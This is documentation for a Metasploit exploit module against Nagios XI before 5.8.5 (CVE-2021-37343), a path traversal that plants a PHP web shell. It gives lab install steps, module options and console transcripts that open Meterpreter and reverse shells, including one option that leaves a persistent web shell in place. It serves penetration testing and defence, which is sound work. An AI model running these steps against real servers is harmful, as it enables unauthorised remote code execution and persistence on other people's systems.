/documentation/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell.md
Markdown | 226 lines | 188 code | 38 blank | 0 comment | 0 complexity | 8de2681c871a648f4c875eaa4d21eb0f MD5 | raw file
- ## Vulnerable Application
- ### Description
- This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343). The path
- traversal allows a remote and authenticated administrator to upload a PHP web shell and execute code as
- `www-data`. The module achieves this by creating an autodiscovery job with an `id` field containing a
- path traversal to a writable and remotely accessible directory, and `custom_ports` field containing
- the web shell. A cron file will be created using the attacker's chosen path and name, and the web
- shell is embedded in the file.
- After the web shell has been written to the victim, this module will then use the webshell to establish
- a Meterpreter session or a reverse shell. By default, the web shell is deleted by the module, and the
- autodiscovery job is removed as well.
- ### Installation
- The following was tested on Ubuntu 20.04.
- * wget https://assets.nagios.com/downloads/nagiosxi/5/xi-5.8.4.tar.gz
- * tar -xvf xi-5.8.4.tar.gz
- * cd nagiosxi
- * sudo ./fullinstall
- The installer will spend a good deal of time installing many things. Upon completion, navigate to
- the Web UI, accept license agreements, and configure the administrator username and password.
- ## Verification Steps
- * Follow the instructions above to install Nagios XI 5.8.4 on Ubuntu 20.04
- * Do: `use exploit/linux/http/nagios_xi_autodiscovery_webshell`
- * Do: `set RHOST <ip>`
- * Do: `set PASSWORD <password>`
- * Do: `check`
- * Verify the target is flagged as vulnerable
- * Do: `set LHOST <ip>`
- * Do: `run`
- * You should get a Meterpreter session.
- ## Options
- ### TARGETURI
- Specifies base URI. The default value is `/nagiosxi`.
- ### USERNAME
- The username to log in to the Nagios XI web interface with. The default is `nagiosadmin`.
- ### PASSWORD
- The password to log in with. Set to `nil` by default.
- ### DEPTH
- The depth of the path traversal. Default is 10.
- ### WEBSHELL_NAME
- Allows the user to name the webshell. If the user doesn't provided a name then one will be automatically generated.
- Set to `nil` by default.
- ### DELETE_WEBSHELL
- Indicates if the web shell should be deleted after the meterpreter session or reverse shell is established.
- A user may want to leave behind a web shell for persistence reasons. The default is `true`.
- ## Scenarios
- ### Nagios XI 5.8.4 - Get a Meterpreter Session
- ```
- msf6 > use auxiliary/scanner/http/nagios_xi_scanner
- msf6 auxiliary(scanner/http/nagios_xi_scanner) > set RHOST 10.0.0.6
- RHOST => 10.0.0.6
- msf6 auxiliary(scanner/http/nagios_xi_scanner) > set PASSWORD labpass1
- PASSWORD => labpass1
- msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
- [*] Attempting to authenticate to Nagios XI...
- [+] Successfully authenticated to Nagios XI
- [*] Target is Nagios XI with version 5.8.4
- [+] The target appears to be vulnerable to the following 1 exploit(s):
- [*]
- [*] CVE-2021-37343 exploit/linux/http/nagios_xi_autodiscovery_webshell
- [*]
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell
- [*] Using configured payload linux/x86/meterpreter/reverse_tcp
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
- LHOST => 10.0.0.3
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
- RHOST => 10.0.0.6
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
- PASSWORD => labpass1
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run
- [*] Started reverse TCP handler on 10.0.0.3:4444
- [*] Running automatic check ("set AutoCheck false" to disable)
- [*] Attempting to authenticate to Nagios XI...
- [+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
- [*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
- [*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
- [*] Testing if web shell installation was successful
- [+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
- [*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
- [*] Sending stage (989032 bytes) to 10.0.0.6
- [+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
- [*] Command Stager progress - 100.00% done (700/700 bytes)
- [*] Deleting autodiscovery job
- [*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44224 ) at 2022-02-05 17:53:27 -0800
- meterpreter > shell
- Process 800816 created.
- Channel 1 created.
- uname -a
- Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
- whoami
- www-data
- pwd
- /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp
- ```
- ### Nagios XI 5.8.4 - Get a reverse shell
- ```
- msf6 > use auxiliary/scanner/http/nagios_xi_scanner
- msf6 auxiliary(scanner/http/nagios_xi_scanner) > set RHOST 10.0.0.6
- RHOST => 10.0.0.6
- msf6 auxiliary(scanner/http/nagios_xi_scanner) > set PASSWORD labpass1
- PASSWORD => labpass1
- msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
- [*] Attempting to authenticate to Nagios XI...
- [+] Successfully authenticated to Nagios XI
- [*] Target is Nagios XI with version 5.8.4
- [+] The target appears to be vulnerable to the following 1 exploit(s):
- [*]
- [*] CVE-2021-37343 exploit/linux/http/nagios_xi_autodiscovery_webshell
- [*]
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell
- [*] Using configured payload linux/x86/meterpreter/reverse_tcp
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set target 0
- target => 0
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
- RHOST => 10.0.0.6
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
- LHOST => 10.0.0.3
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
- PASSWORD => labpass1
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run
- [*] Started reverse double SSL handler on 10.0.0.3:4444
- [*] Running automatic check ("set AutoCheck false" to disable)
- [*] Attempting to authenticate to Nagios XI...
- [+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
- [*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
- [*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
- [*] Testing if web shell installation was successful
- [+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
- [*] Executing Unix Command for cmd/unix/reverse_openssl
- [*] Deleting autodiscovery job
- [*] Accepted the first client connection...
- [*] Accepted the second client connection...
- [*] Command: echo nyjlVFXNgWehsWFs;
- [*] Writing to socket A
- [*] Writing to socket B
- [*] Reading from sockets...
- [*] Reading from socket B
- [*] B: "nyjlVFXNgWehsWFs\n"
- [*] Matching...
- [*] A is input...
- [+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
- [*] Command shell session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44226 ) at 2022-02-05 17:56:49 -0800
- whoami
- www-data
- id
- uid=33(www-data) gid=33(www-data) groups=33(www-data),135(Debian-snmp),1001(nagios),1002(nagcmd)
- pwd
- /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp
- ```
- ### Nagios XI 5.8.4 - Leave a web shell behind
- ```
- msf6 > use exploit/linux/http/nagios_xi_autodiscovery_webshell
- [*] Using configured payload linux/x86/meterpreter/reverse_tcp
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
- RHOST => 10.0.0.6
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
- LHOST => 10.0.0.3
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
- PASSWORD => labpass1
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set DELETE_WEBSHELL false
- DELETE_WEBSHELL => false
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set WEBSHELL_NAME lobster.php
- WEBSHELL_NAME => lobster.php
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run
- [*] Started reverse TCP handler on 10.0.0.3:4444
- [*] Running automatic check ("set AutoCheck false" to disable)
- [*] Attempting to authenticate to Nagios XI...
- [+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
- [*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
- [*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php
- [*] Testing if web shell installation was successful
- [+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php
- [*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
- [*] Sending stage (989032 bytes) to 10.0.0.6
- [*] Command Stager progress - 100.00% done (700/700 bytes)
- [*] Deleting autodiscovery job
- [*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44230 ) at 2022-02-05 18:07:14 -0800
- meterpreter > quit
- [*] Shutting down Meterpreter...
- [*] 10.0.0.6 - Meterpreter session 1 closed. Reason: User exit
- msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > exit
- albinolobster@ubuntu:~/metasploit-framework$ curl --insecure https://10.0.0.6/nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php?cmd=id
- 0 9 * * * rm -f '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.xml'; touch '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.watch'; sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses='127.0.0.1/0' --exclude='' --output='../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.xml' --watch='/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.watch' --onlynew=0 --debug=1 --detectos=1 --detecttopo=1 --customports='uid=33(www-data) gid=33(www-data) groups=33(www-data),135(Debian-snmp),1001(nagios),1002(nagcmd)
- ' > '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.out' 2>&1 & echo $! > /dev/null 2>&1
- ```